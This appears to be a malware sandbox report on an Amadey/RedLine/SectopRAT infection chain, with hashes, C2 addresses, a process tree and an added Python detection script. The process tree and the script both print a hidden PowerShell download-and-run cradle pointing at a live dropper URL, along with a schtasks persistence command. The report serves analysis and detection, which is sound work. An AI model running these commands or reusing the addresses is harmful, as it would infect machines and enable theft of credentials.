Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    15-02-2025 17:02

General

  • Target

    5QZQM_random.exe

  • Size

    938KB

  • MD5

    2a652936c15591f45c63a9c6c01ed212

  • SHA1

    5dad7de67525e4b6f3ed8e5d6f4257943eac7c62

  • SHA256

    1723bd9dd8938f0a1d3cd89fe50a54f8538d4961c2a15d385e94f0e0f36d9be7

  • SHA512

    64981162e2202c9ed051f5e9a8a04f5760c382fd42a77be3625f6194419f0ee596fb86b68d8a7f8c57b9aa9a4c4dbc90aee1cc69884d45cd572958e2e0b9517f

  • SSDEEP

    24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ay0F:+TvC/MTQYxsWR7ay0

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs

    exe.dropper: http://185.215.113.16/mine/random.exe

Extracted

  • Family

    amadey

  • Version

    4.42

  • Botnet

    9c9aa5

  • C2

    http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

  • Family

    redline

  • Botnet

    cheat

  • C2

    103.84.89.222:33791

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Downloads MZ/PE file 2 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe
    "C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1180
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE
          "C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1768
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1836
            • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
              "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1288
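The process tree above, rendered as detection logic. This is an added example and not part of the sandbox report: the events are constructed Sysmon-style process-creation records whose PIDs and command lines are copied from the Processes section; the parent PID of the first process (900), the benign control task (PID 3000) and the rule names are assumptions. The rules key on what the chain does (schtasks pointing a script host at a user-writable .hta, mshta spawning PowerShell, a PowerShell download cradle with a hidden window) rather than on the random task and file names. The last function reproduces why the downloaded payload sits at ...\Local\TempNP58...EXE rather than under Temp\: the cradle concatenates $env:temp with the file name without a path separator.

```python
"""Detection rules for the chain in the Processes section. Added example, not part of the
report: EVENTS are constructed Sysmon-style process records (PIDs and command lines from the
report; root parent PID 900, the benign task PID 3000 and the rule names are assumptions)."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

# Command line of PID 1256 as printed in the report, split across lines for readability.
PS_CRADLE = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
             r"$d=$env:temp+'NP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE';"
             r"(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);"
             r"Start-Process $d;")
SCHTASKS_CMD = (r'schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" '
                r'/sc minute /mo 25 /ru "Admin" /f')
EVENTS = [
    ProcEvent(1712, 900, r"C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"'),
    ProcEvent(1968, 1712, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c " + SCHTASKS_CMD),
    ProcEvent(1180, 1968, r"C:\Windows\SysWOW64\schtasks.exe", SCHTASKS_CMD),
    ProcEvent(2072, 1712, r"C:\Windows\SysWOW64\mshta.exe", r"mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta"),
    ProcEvent(1256, 2072, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CRADLE),
    # Constructed benign control: a daily task that runs a binary from Program Files.
    ProcEvent(3000, 2900, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\backup.exe" /sc daily /f'),
]

SCRIPT_HOSTS = {"mshta", "wscript", "cscript"}
LOLBIN_HOSTS = SCRIPT_HOSTS | {"powershell", "rundll32", "regsvr32"}
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)
CRADLE_API = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer|\biwr\b", re.I)
URL = re.compile(r"""https?://[^\s'"(),;]+""", re.I)

def exe_name(path):
    """'C:\\x\\mshta.exe' -> 'mshta'; a bare 'mshta' stays 'mshta'."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def task_action(cmdline):
    """Return the /tr action of a 'schtasks /create' command line, else None."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*\s/create\b", cmdline, re.I):
        return None
    m = re.search(r'/tr\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None

def rule_task_persistence(ev, by_pid):
    """Scheduled task whose action is a script host/LOLBin pointed at a user-writable path."""
    action = task_action(ev.cmdline)
    if action and exe_name(action.split()[0]) in LOLBIN_HOSTS and USER_WRITABLE.search(action):
        return f"task action: {action}"

def rule_mshta_user_hta(ev, by_pid):
    """mshta executing an .hta from a user-writable location."""
    if exe_name(ev.image) == "mshta" and USER_WRITABLE.search(ev.cmdline):
        return f"mshta ran {ev.cmdline.split()[-1]}"

def rule_download_cradle(ev, by_pid):
    """PowerShell fetching a URL through a known download API."""
    urls = URL.findall(ev.cmdline)
    if exe_name(ev.image) == "powershell" and urls and CRADLE_API.search(ev.cmdline):
        hidden = re.search(r"-w(?:indowstyle)?\s+hidden", ev.cmdline, re.I) is not None
        return f"urls={urls} hidden_window={hidden}"

def rule_script_host_spawns_powershell(ev, by_pid):
    """A script host (mshta/wscript/cscript) launching PowerShell."""
    parent = by_pid.get(ev.ppid)
    if parent and exe_name(parent.image) in SCRIPT_HOSTS and exe_name(ev.image) == "powershell":
        return f"{exe_name(parent.image)} (PID {parent.pid}) spawned powershell"

RULES = {
    "schtasks_lolbin_persistence": rule_task_persistence,
    "mshta_user_writable_hta": rule_mshta_user_hta,
    "powershell_download_cradle": rule_download_cradle,
    "script_host_spawns_powershell": rule_script_host_spawns_powershell,
}

def scan(events):
    """Return {pid: [(rule_name, detail), ...]} for every event that fired a rule."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev, by_pid)
            if detail:
                findings.setdefault(ev.pid, []).append((name, detail))
    return findings

def predicted_drop_path(cmdline, temp=r"C:\Users\Admin\AppData\Local\Temp"):
    """Emulate $d=$env:temp+'NAME': plain concatenation, no separator, which is why the
    report lists the payload at ...\\Local\\TempNP58...EXE instead of under Temp\\."""
    m = re.search(r"\$env:temp\+'([^']+)'", cmdline, re.I)
    return temp + m.group(1) if m else None
```

Calling scan(EVENTS) flags PIDs 1968, 1180, 2072 and 1256 and leaves 1712 and the control task 3000 alone. To run it against real Sysmon Event ID 1 records, build ProcEvent values from ProcessId, ParentProcessId, Image and CommandLine. The schtasks rule deliberately ignores the task name (NpghkmaxE8b is random per sample) and keys on a script host being pointed at a user-writable path; the cradle rule needs both a download API and a URL, so the same one-liner with a different host or file name still fires.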

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1

    Filesize

    768KB

    MD5

    c7b5c7ade500f25ce46fecf31dd278d3

    SHA1

    c22cd6ba0bc78cb3d54c8f5a08cebf36beb4cd8c

    SHA256

    dbb48c518e9c81967e7867a780e3b0a6dfa1033a631ce8421dfca0b52b52e095

    SHA512

    59dec1f7445c02c7177269f8d099f5f1b4928422f929a57bec06b1ce51fc7ff36b475cbbacfa1b7d847ea1fb23812602e50675e9c50ae039b235f96e150e6828

  • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe

    Filesize

    1.7MB

    MD5

    f662cb18e04cc62863751b672570bd7d

    SHA1

    1630d460c4ca5061d1d10ecdfd9a3c7d85b30896

    SHA256

    1e9ff1fc659f304a408cff60895ef815d0a9d669a3d462e0046f55c8c6feafc2

    SHA512

    ce51435c8fb272e40c323f03e8bb6dfa92d89c97bf1e26dc960b7cab6642c2e4bc4804660d0adac61e3b77c46bca056f6d53bedabcbeb3be5b6151bf61cee8f4

  • C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta

    Filesize

    720B

    MD5

    c6910aed9f6537768f85e6410cbbd8ee

    SHA1

    9ac3ba2b01f0e19f9718f74108a5fb0f52691e3b

    SHA256

    1e2daf6bca2110c968aae773c7b92a10d7122fd2fa07edb5054d35226e873571

    SHA512

    af3a7732969935749fee625794944be4164436c4802dd82f05e664c0f8bf588245c5cceb38a5c3e176508bbc3772a13f5e2d46db9b583fb4c3e2f8f0d8c6d9ec

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\52VTCIAENQU2XW1S36AF.temp

    Filesize

    7KB

    MD5

    2f09b9176f9eb831c6f02b0aabb86f06

    SHA1

    acfa4630873566453d0bb9e7676c4ac1518d1503

    SHA256

    0043bded281bbe23e578340e9c8b44549bbc62d01d165c27efca057fe2990721

    SHA512

    0cd983a6d18bcf86bf4fb60c0e38c8bef979e4d4ee2c60cbb024f714d362b32deb14ff79e431baa561751958fcf563b9826144bd20bcbf70920be275704eff59

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    2ac825279630cfaf2b7d3f5ccd7903e7

    SHA1

    d803975a7b0721ae5f64740081d5de3f80cd1fbe

    SHA256

    36db64ff9322bb2db2718e8736c7d6131dab26e9550af58dfaec89bead152f28

    SHA512

    4ceb98b4967dedc7d6131a2b0680fed4b316abca3466d2c4240c1560d69d6842b7fb3ae7b79ce8e3059a7a334bc31b97d30eab549234d4b0332f610e72e4efef

  • \Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE

    Filesize

    2.1MB

    MD5

    569e59d6838517ef40ad5d42d5ffe3ab

    SHA1

    06e6b6e5fa09611b56aa56bc81173cfcbd138640

    SHA256

    772137b7c1ca4002181b9252143c9793c9f45c0935564a75d44fbc6d2aa33d30

    SHA512

    1ac54228ffa2a71de44dba4e68b24426db3c17a09140fd441be8be92c7f5758fc46bb7f0e9501019efce68e3a745eece7da4284c89d5dd039f4b3c0e5434b768

  • memory/1256-13-0x0000000006630000-0x0000000006AF2000-memory.dmp

    Filesize

    4.8MB

  • memory/1256-12-0x0000000006630000-0x0000000006AF2000-memory.dmp

    Filesize

    4.8MB

  • memory/1288-78-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

  • memory/1288-77-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

  • memory/1288-76-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

  • memory/1288-81-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

  • memory/1768-15-0x0000000000B30000-0x0000000000FF2000-memory.dmp

    Filesize

    4.8MB

  • memory/1768-29-0x00000000070D0000-0x0000000007592000-memory.dmp

    Filesize

    4.8MB

  • memory/1768-31-0x0000000000B30000-0x0000000000FF2000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-35-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-54-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-55-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-57-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-58-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-59-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-60-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-61-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-53-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-38-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-75-0x0000000006990000-0x0000000006E08000-memory.dmp

    Filesize

    4.5MB

  • memory/2552-37-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-36-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-79-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

  • memory/2552-80-0x0000000006990000-0x0000000006E08000-memory.dmp

    Filesize

    4.5MB

  • memory/2552-32-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB